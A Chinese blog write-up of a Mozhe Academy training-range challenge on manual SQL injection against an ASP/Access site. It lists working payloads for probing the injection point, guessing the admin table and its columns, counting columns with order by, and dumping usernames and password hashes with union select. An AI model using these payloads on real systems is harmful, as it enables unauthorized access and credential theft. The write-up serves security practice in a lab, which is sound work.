【墨者學院】--SQL手工注入漏洞測試(Access數據庫)

背景介紹

安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境IIS+ASP+Access,Aspx代碼對客戶端提交的參數未做任何過濾。盡情的練習SQL手工注入吧。

實訓目標

1.掌握SQL注入原理;
2.瞭解手工注入的方法;
3.瞭解Access的數據結構;
4.瞭解字符串的MD5加解密;

解題方向

手工進行SQL注入測試,獲取管理密碼登錄。
在這裏插入圖片描述

1、判斷注入點:

分別用and 1=1和and 1=2測試,發現1=1的時候頁面沒有變化,1=2的時候頁面發生變化,說明存在數字型注入。

2、猜表名:
id=1 and exists(select * from admin)    //頁面返回正常,說明存在admin表
3、猜列名:
id=1 and exists(select username from admin)     //頁面返回正常,說明存在username列
id=1 and exists(select passwd from admin)   //頁面返回正常,說明存在passwd列

4、判斷某個id對應的列數:
id=1 order by 4    //顯示正常
id=1 order by 5   //顯示不正常,說明數據庫字段是4
5、判斷某個id對應的列數:
id=1 union select 1,username,passwd,4 from admin

在這裏插入圖片描述

最後解密MD5登錄後臺獲取key值。
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章